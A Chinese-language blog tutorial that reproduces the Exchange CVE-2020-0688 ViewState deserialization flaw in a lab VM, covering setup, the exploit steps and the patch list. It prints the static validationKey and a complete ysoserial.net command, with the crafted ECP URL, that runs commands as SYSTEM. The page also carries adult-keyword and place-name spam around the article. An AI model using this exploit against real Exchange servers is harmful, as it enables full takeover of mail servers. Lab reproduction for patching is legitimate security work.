亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行微軟Exchange服務遠程代碼執行漏洞復現

發布時間:2021-12-28 17:07:23 來源:億速云 閱讀:327 作者:柒染 欄目:安全技術

這篇文章將為大家詳細講解有關如何進行微軟Exchange服務遠程代碼執行漏洞復現,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。

環境搭建

使用Windows Server 2008安裝Exchange Server 2013

  • 首先要在虛擬機內將Server2008設置為靜態IP
    如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 服務器管理器中選擇添加角色-勾選域服務
    如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 安裝完成后,在開始->運行打開dcpromo

如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 點擊兩次下一步后,選擇在新林中新建域

如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 輸入一個域名格式

如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 選擇win2008,勾選dns

如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 設置密碼

如何進行微軟Exchange服務遠程代碼執行漏洞復現如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 完成安裝

如何進行微軟Exchange服務遠程代碼執行漏洞復現

前期準備

  • 打開ad用戶和計算機,選擇users添加域用戶
    如何進行微軟Exchange服務遠程代碼執行漏洞復現如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 創建完成后更改域
    如何進行微軟Exchange服務遠程代碼執行漏洞復現如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 輸入剛剛添加的用戶,之后重啟計算機
    如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 使用剛才添加的用戶登錄后安裝其他必備組件
    管理員啟動powershell
    Import-Module ServerManager
    Add-WindowsFeature RSAT-ADDS
    如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 安裝完成后重啟計算機,使用管理員權限打開powershell
    Import-Module ServerManager
    Add-WindowsFeature NET-Framework, ADLDS
    如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 安裝.Net 4.5

如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 安裝Microsoft Office 2010 Filter Pack 64 位
    https://www.microsoft.com/en-us/download/confirmation.aspx?id=17062

如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 打開exchange,選擇解壓位置

如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 開始安裝Exchang
    如何進行微軟Exchange服務遠程代碼執行漏洞復現
    如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 安裝過程遇到一堆問題,挨個解決。。
    如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 開始正式安裝
    如何進行微軟Exchange服務遠程代碼執行漏洞復現

安裝完成

如何進行微軟Exchange服務遠程代碼執行漏洞復現

CVE-2020-0688漏洞復現

  • 漏洞詳情
    具體來說,漏洞是在Exchange Control Panel (ECP)組件中發現的。這個漏洞的性質非常簡單。與每次軟件安裝都會產生隨機密鑰不同,所有Microsoft Exchange Server在安裝后的web.config文件中都擁有相同的validationKey和decryptionKey。這些密鑰用于保證ViewState的安全性。而ViewState是ASP.NET Web應用以序列化格式存儲在客戶機上的服務端數據。客戶端通過__VIEWSTATE請求參數將這些數據返回給服務器。
    如何進行微軟Exchange服務遠程代碼執行漏洞復現

由于使用了靜態密鑰,經過身份驗證的攻擊者可以欺騙目標服務器反序列化惡意創建的ViewState數據。在YSoSerial.net的幫助下,攻擊者可以在Exchange Control Panel web應用上執行任意.net代碼。

  • 為了利用這個漏洞,我們需要從經過身份驗證的session中收集ViewStateUserKey和__VIEWSTATEGENERATOR值。ViewStateUserKey可以從ASP.NET的_SessionIDcookie中獲取,而ViewStateUserKey可以在一個隱藏字段中找到。所有這些都可以通過瀏覽器中的工具輕松找到。
    首先,進入192.168.92.128/ecp頁面并登錄。所使用的帳戶不需要任何高權限
    如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 接下來,打開瀏覽器開發工具的Network選項,然后按F5重新發送請求。在頁面源代碼中可以找到 __VIEWSTATEGENERATOR,它的值是B97B4E27
    如何進行微軟Exchange服務遠程代碼執行漏洞復現
    然后,打開Headers選項卡并找到ASP.NET_SessionId=40c8e078-dc79-4001-9a52-de175b38a028
    如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 現在獲得了攻擊所需要的全部信息:
    --validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
    --validationalg = SHA1
    --generator = B97B4E27
    --viewstateuserkey = c1187666-c0ae-4f61-95d4-d2f5348d4300

  • 下一步是使用ysoserial.net生成ViewState的paylaod。通過創建文件C:\TideSec.txt來演示遠程代碼執行:
    ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c echo test > C:\TideSec.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="c1187666-c0ae-4f61-95d4-d2f5348d4300" --isdebug --islegacy
    如何進行微軟Exchange服務遠程代碼執行漏洞復現

  • 將輸出結果進行URL編碼并構造如下URL:
    https://192.168.92.128/ecp/default.aspx?VIEWSTATEGENERATOR=&VIEWSTATE=
    如何進行微軟Exchange服務遠程代碼執行漏洞復現

如何進行微軟Exchange服務遠程代碼執行漏洞復現

瀏覽器內提交地址進行訪問,回顯500錯誤,但實際已經創建成功,并且可以看到是具有SYSTEM”權限的進程創建的。這表明攻擊者可以以“SYSTEM”身份遠程執行代碼,完全破壞Exchange服務器。

如何進行微軟Exchange服務遠程代碼執行漏洞復現

如何進行微軟Exchange服務遠程代碼執行漏洞復現

影響范圍及加固

  • 影響版本
    影響所有版本的Exchang Server:
    Microsoft Exchange Server 2010 Service Pack 3
    Microsoft Exchange Server 2013
    Microsoft Exchange Server 2016
    Microsoft Exchange Server 2019

  • 防護措施
    補丁下載
    Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 KB4536989
    Microsoft Exchange Server 2013 Cumulative Update 23 KB4536988
    Microsoft Exchange Server 2016 Cumulative Update 14 KB4536987
    Microsoft Exchange Server 2016 Cumulative Update 15 KB4536987
    Microsoft Exchange Server 2019 Cumulative Update 3 KB4536987
    Microsoft Exchange Server 2019 Cumulative Update 4 KB4536987

關于如何進行微軟Exchange服務遠程代碼執行漏洞復現就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

朔州市| 娄烦县| 南溪县| 阿尔山市| 桃园县| 桂林市| 庐江县| 通渭县| 东阿县| 迭部县| 安图县| 乳山市| 石泉县| 武安市| 新宁县| 宁南县| 师宗县| 科技| SHOW| 河北区| 青海省| 旬邑县| 噶尔县| 固始县| 义马市| 固阳县| 墨脱县| 青岛市| 运城市| 彭水| 荔浦县| 横峰县| 房山区| 珠海市| 鹤壁市| 静乐县| 方城县| 青铜峡市| 泌阳县| 九寨沟县| 大安市|